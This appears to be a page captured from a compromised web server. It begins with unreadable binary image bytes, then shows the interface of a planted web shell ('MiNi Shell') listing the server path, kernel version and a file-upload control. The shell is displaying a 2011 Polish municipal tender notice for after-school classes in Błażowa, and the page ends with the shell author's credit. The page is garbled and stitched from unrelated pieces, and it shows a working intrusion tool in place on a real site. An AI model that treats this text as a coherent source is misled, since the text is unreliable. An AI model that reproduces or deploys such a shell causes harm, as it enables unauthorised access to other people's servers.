JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/333337-N-2011.html

<p class="kh_header"><b>Błażowa: Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w Gminie Błażowa</b><br>
<b>Numer ogłoszenia: 333337 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy w Błażowej , Plac Wolności 1, 36-030 Błażowa, woj. podkarpackie, tel. 017/2297119, faks (017) 2297077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blazowa.itl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w Gminie Błażowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych obejmujących prowadzenie zajęć dla uczestników projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w Gminie Błażowa w II semestrze w roku szkolnym 2011-2012, dla których organem prowadzącym jest Gmina Błażowa. Zamówienie obejmuje prowadzenie zajęć pozalekcyjnych (dydaktyczno - wyrównawczych oraz rozwijających zainteresowania) w klasach I-III w ośmiu szkołach podstawowych, w Gminie Błażowa, w roku szkolnym 2011-12. 
Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, dostosowanie zajęć do potrzeb uczniów.  Zamówienie obejmuje prowadzenie: zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji, zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, zajęć logopedycznych korygujących wady wymowy, zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy, a także rozwijających zainteresowania uczniów uzdolnionych z uwzględnieniem: zajęć matematyczno- przyrodniczych, matematycznych przyrodniczych, plastycznych, artystycznych, sportowych oraz zajęć rozwijających z języka angielskiego.  Przedmiot zamówienia został podzielony na 11 części. W zależności od ilości szkół części te podzielone zostały na grupy. Oferty można składać na dowolną ilość części lub grup. Dla każdej części zamówienia będzie oddzielnie wybierana oferta najkorzystniejsza. W ramach każdej grupy przewidziane jest przeprowadzenie 35 godzin lekcyjnych (1 godzina = 45 minut). Usługi edukacyjne będą realizowane w niżej wymienionych szkołach w dniach i godzinach ustalonych z Dyrektorem Szkoły (odpowiednio do części). Część I Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy Prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w szkołach podstawowych w: 
Część I.1 - SP w Lecce, 1 grupa x 35 godzin
Część I.2 - SP w Futomie,  1 grupa x 35 godzin
Część I.3 - SP w Piątkowej, 1 grupa x 35 godzin
Łącznie 3 grupy (11 uczniów) - razem 105 godzin.
Program zajęć ma obejmować: usprawnianie narządów artykulacji, wywoływanie, utrwalanie i automatyzacja głosek, ćwiczenia słuchu fonematycznego, analizy i syntezy słuchu, kształtowanie i rozwijanie umiejętności komunikowania się z otoczeniem, usprawnienie umiejętności szkolnych metodami Dennisona
Część II
Zajęcia dla uczniów ze specyficznymi trudnościami w czytaniu i pisaniu 
Prowadzenie zajęć dla uczniów ze specyficznymi trudnościami w czytaniu i pisaniu w szkołach podstawowych w: 
Część II.1 - SP w Błażowej, 2 grupy x 35 godzin = 70 godz.
Część II.2 - SP w Futomie,  1 grupa x 35 godzin
Część II.3 - SP w Piątkowej, 1 grupa x 35 godzin
Część II.4 - SP w Błażowej Dolnej, 1 grupa x 35 godzin
Część II.5 - SP w Kąkolówce,  2 grupy x 35 godzin = 70 godz
Część II.6 - SP w Nowym Borku, 2 grupy x 35 godzin = 70 godz
Część II.7 - SP w Lecce,  1 grupa x 35 godzin
Część II.8 - SP w Białce, 1 grupa x 35 godzin
Łącznie 79 uczniów podzielonych na 11 grup x 35 godzin = 385 godzin. 
Program zajęć ma obejmować: ćwiczenia poprawiające percepcję wzrokową i słuchową, utrwalanie liter, ćwiczenia zwiększające tempo czytania, stopień rozumienia tekstu, metodę sylabową, ćwiczenia w pisaniu z pamięci i ze słuchu, manualne, graficzne.

Część III
Zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Prowadzenie zajęć dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych w szkołach:
Część III.1 - SP w Błażowej, 2 grupy x 35 godzin = 70 godz.
Część III.2 - SP w Futomie,  1 grupa x 35 godzin
Część III.3 - SP w Piątkowej, 1 grupa x 35 godzin
Część III.4 - SP w Błażowej Dolnej, 1 grupa x 35 godzin
Część III.5 - SP w Kąkolówce,  1 grupa x 35 godzin
Część III.6 - SP w Nowym Borku, 1 grupa x 35 godzin
Część III.7 - SP w Lecce,  1 grupa x 35 godzin
Część III.8 - SP w Białce, 1 grupa x 35 godzin
Łącznie 56 uczniów podzielonych na 9 grup x 35 godzin = 315godzin. 
Program zajęć ma obejmować: ćwiczenia w zakresie czynnościowego nauczania matematyki, usprawnianie techniki rachunkowej, logicznego myślenia, rozwiązywania zadań tekstowych, rozwijanie umiejętności praktycznych uczniów.
Część IV
Zajęcia dla uczniów uzdolnionych rozwijających zainteresowania matematyczno-przyrodnicze
Prowadzenie zajęć dla uczniów szczególnie uzdolnionych w szkołach podstawowych w: 
Część IV.1 - SP w Nowym Borku, 1 grupa x 35 godzin.
Część IV.2 - SP w Futomie,  1 grupa x 35 godzin
Część IV.3 - SP w Piątkowej, 1 grupa x 35 godzin
Część IV.4 - SP w Błażowej Dolnej, 1 grupa x 35 godzin
Część IV.5 - SP w Lecce,  1 grupa x 35 godzin
Łącznie 37 uczniów podzielonych na 5 grup x 35 godzin = 175godzin. 
Program zajęć ma obejmować: rozwiązywanie złożonych zadań tekstowych, gry i zabawy matematyczno-logiczne, doświadczenia i obserwacje dotyczące świata zwierząt i roślin, ekologii, zdrowia i higieny.

Część V
Zajęcia dla uczniów z gimnastyki korekcyjnej 
Prowadzenie zajęć dla uczniów z gimnastyki korekcyjnej w szkołach podstawowych w: 
Część V.1 - SP w Nowym Borku, 1 grupa x 35 godzin.
Część V.2 - SP w Futomie,  1 grupa x 35 godzin
Część V.3 - SP w Piątkowej, 1 grupa x 35 godzin
Część V.4 - SP w Błażowej, 1 grupa x 35 godzin
Część V.5 - SP w Lecce,  1 grupa x 35 godzin
Część V.6 - SP w Białce,  1 grupa x 35 godzin
Razem 73 uczniów w 6 grupach x 35 godzin = 210 godzin. 
Program zajęć ma obejmować: kształtowanie prawidłowej postawy ciała u uczniów, nauka ćwiczeń wzmacniających poszczególne partie mięśni, zabawy i gry ruchowe z elementami korektywy.

Część VI
Zajęcia dla uczniów uzdolnionych rozwijające zainteresowania w zakresie języka angielskiego 
Prowadzenie zajęć dla 10 uczniów w SP w Kąkolówce, 1 grupa x 35 godzin = 35 godzin.
Program zajęć ma obejmować: poszerzanie poznanego słownictwa i czynnego słownika ucznia poprzez: gry i zabawy językowe, karty obrazkowe i wyrazowe, czytanie krótkich opowiadań, oglądanie filmów, tworzenie słowniczków.

Część VII
Zajęcia dla uczniów uzdolnionych rozwijające zainteresowania plastyczne
Prowadzenie zajęć dla 13 uczniów w: 
Część VII.1 - SP w Błażowej Dolnej, 2 grupy x 35 godzin = 70 godzin
Część VII.2 - SP w Błażowej,  1 grupa x 35 godzin
Razem 3 grupy x 35 godzin = 105 godzin
Program zajęć ma obejmować: zapoznanie z różnorodnymi technikami plastycznymi, posługiwanie się środkami wyrazu artystycznego - barwa, faktura, ruch, perspektywa, uwzględnianie realizmu i fantazji w plastyce.

Część VIII
Zajęcia dla uczniów uzdolnionych rozwijające zainteresowania przyrodnicze
Prowadzenie zajęć dla 5 uczniów w SP w Białce, 1 grupa x 35 godzin = 35 godzin
Program zajęć ma obejmować: doświadczenia i obserwacje dotyczące świata zwierząt i roślin, środowiska życia, ekologii, zdrowia i higieny człowieka, zjawisk zachodzących we wszechświecie.
Część IX
Zajęcia dla uczniów uzdolnionych rozwijające zainteresowania taneczne
Prowadzenie zajęć dla 16 uczniów w SP w Błażowej, 1 grupa x 35 godzin = 35 godzin
Program zajęć ma obejmować: nauka tańca ludowego z różnych regionów Polski, będzie kontynuacją rozbudzonych zainteresowań i rozwoju umiejętności tanecznych uzdolnionych dzieci, które w okresie edukacji przedszkolnej rozpoczęły naukę tańca ludowego.

Część X
Zajęcia dla uczniów uzdolnionych rozwijające zainteresowania matematyczne
Prowadzenie zajęć w szkołach:
Część X.1 - SP w Błażowej, 1 grupa x 35 godzin
Część X.2 - SP w Białce,  1 grupa x 35 godzin
Razem: 17 uczniów, 2 grupy x 35 godzin = 70 godzin
Program zajęć ma obejmować: - rozwiązywanie złożonych i nietypowych zadań tekstowych dotyczących symetrii, miar i pieniędzy, gry i zabawy matematyczno-logiczne z wykorzystaniem programów komputerowych, przygotowanie do udziału w konkursach matematycznych.

Część XI
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ruchowo w zakresie tenisa stołowego
Prowadzenie zajęć dla 12 uczniów w SP w Kąkolówce, 1 grupa x 35 godzin = 35 godzin
Program zajęć ma obejmować: ćwiczenie prawidłowej postawy i poruszania się przy stole, umiejętność uderzenia atakującego z forhendu i bekhendu, umiejętność podania piłki z rotacją górną i dolną, udział w turniejach tenisa stołowego.
Do obowiązków prowadzącego będzie należało m. in.: 
1) prowadzenie zajęć pozalekcyjnych, w godzinach dostosowanych do planu lekcji szkolnych oraz planu dowozu dzieci do szkoły i warunków szkoły (zaleca się, aby zajęcia odbywały się w miarę możliwości bezpośrednio po lekcjach lub przed) w terminie maksymalnym do 30 czerwca 2012 roku; 
2) dokumentowanie zajęć pozalekcyjnych w kartach czasu pracy, dziennikach zajęć, listach obecności, kartach ewaluacji; 
3) sporządzanie sprawozdań miesięcznych z realizacji zajęć, współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia; 
4) opracowanie w terminie 7 dni od daty zawarcia umowy szczegółowego harmonogramu oraz zakres zajęć dla uczestników projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w Gminie Błażowa i przedstawienia ww dokumentów do akceptacji dyrektorowi szkoły i koordynatorowi projektu; 
5) opracowanie programu zajęć będącego przedmiotem umowy z wykorzystaniem pomocy dydaktycznych udostępnionych przez Zamawiającego, wyszczególnionych w załączniku nr 6. Program zajęć powinien zawierać co najmniej ramowy zakres, który został wyszczególniony w opisie poszczególnych części w pkt. 3.3. Program zajęć stanowić będzie obowiązkowy załącznik do oferty, 
6) realizacja przedmiotu umowy zgodnie z uzgodnionym z dyrektorem jednostki i koordynatorem projektu harmonogramem zajęć, 
7) prawidłowe i systematyczne prowadzenie dokumentacji przedmiotu umowy oraz comiesięcznego przekazywania w formie elektronicznej i pisemnej informacji dyrektorowi szkoły i koordynatorowi projektu o stanie realizacji przedmiotu umowy, w tym liczbie zrealizowanych godzin(karty pracy, dzienniki lekcyjne), 
8) dokumentowanie przedmiotu umowy w dziennikach zajęć; 
9)wspomaganie promocji i ewaluacji przedmiotu umowy, w tym informowanie o finansowaniu przedmiotu umowy ze środków Europejskiego Funduszu Społecznego oraz ścisła współpraca z koordynatorem projektu w mierzeniu  rezultatów przedmiotu umowy, 
10)mierzenie rezultatów przedmiotu umowy za pomocą  testów umiejętności, sprawdzianów itp. (przeprowadzonych przed rozpoczęciem zajęć, w razie potrzeb w trakcie realizacji oraz na zakończenie projektu), 
11)opis w dziennikach zajęć diagnozy problemu  i analiza rezultatów założonych i osiągniętych przez uczniów - uczestników przedmiotu umowy we wstępnym etapie projektu i na jego zakończenie, 
12)dobieranie metod nauczania ze szczególnym naciskiem na umiejętności praktyczne uczniów. Zamawiający zapewnia pomoce dydaktyczne służące indywidualizacji nauczania. Pomoce dydaktyczne będą ściśle związane z zajęciami dodatkowymi wskazanymi powyżej oraz będą odpowiadać rozpoznanym potrzebom, 
13)ponoszenie odpowiedzialności za bezpieczeństwo uczestników przedmiotu umowy w czasie jego trwania, 
14)przestrzeganie regulaminu pracowni, 
15)bieżące informowanie koordynatora projektu i dyrektora szkoły o problemach mogących mieć wpływ na terminową lub prawidłową realizację przedmiotu umowy-nieobecności uczestników na zajęciach lub prowadzącego ewentualne odstępstwa od harmonogramu itp., 
16)wykonywanie innych czynności wynikających ze specyfiki dla danej części przedmiotu umowy, mających na celu osiągnięcie rezultatów przedmiotu umowy, 
17)Wykonawca jest zobowiązany umieścić logo i oznaczenia wskazane przez Zamawiającego. na wszystkich opracowanych przez siebie materiałach oraz w korespondencji prowadzonej w związku z realizacją niniejszej umowy 
18)Zamawiający zastrzega sobie prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 42.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnił warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże że dysponuje minimum jedną osobą (odpowiednio do części) posiadającą następujące kwalifikacje: 
1) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym (dotyczy każdej części), 
2) co najmniej stopień awansu nauczyciela kontraktowego (dotyczy każdej części), 
3) kwalifikacje do nauczania w klasach I - III szkoły podstawowej (dotyczy części III, IV, VII, VIII, X), 
4) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie logopedii lub uprawnienia do prowadzenia zajęć logopedycznych: studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny dający uprawnienia do prowadzenia zajęć logopedycznych (dotyczy części I), 
5) uprawnienia do prowadzenia zajęć z gimnastyki korekcyjnej: studia podyplomowe w zakresie gimnastyki korekcyjnej lub kurs kwalifikacyjny dający uprawnienia do prowadzenia zajęć z gimnastyki korekcyjnej (dotyczy części V), 
6) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje z terapii pedagogicznej ( dotyczy części II)
7) ) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje do nauczania j. angielskiego (dotyczy części VI)
8) ) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje w zakresie wychowania fizycznego oraz minimum kurs instruktora tenisa stołowego ( dotyczy części XI).
Zamawiający dokona oceny spełniania tego warunku na podstawie złożonych dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby muszą posiadać minimum trzyletnie doświadczenie w wykonywaniu usług o charakterze jak przedmiot niniejszego zamówienia - odpowiednio do części
Zamawiający dokona oceny spełniania tego warunku na podstawie złożonych dokumentów i oświadczeń, tj. 
1) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (odpowiednio dla części);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie złożonych dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.blazowa.itl.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błażowej
36-030 Błażowa, Plac Jana Pawła II  1 
tel. 17 2297119; fax; 17 2297077, email: blazowa@blazowa.itl.pl
pokój nr 5 p. Robert Złamaniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2011 godzina 10:00, miejsce: Urząd Miejski w Błażowej
36-030 Błażowa, Plac Jana Pawła II  1 
pokój nr 11 (sekretariat)
otwarcie ofert w tym samym dniu w sali nr 4 o godz. 10:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com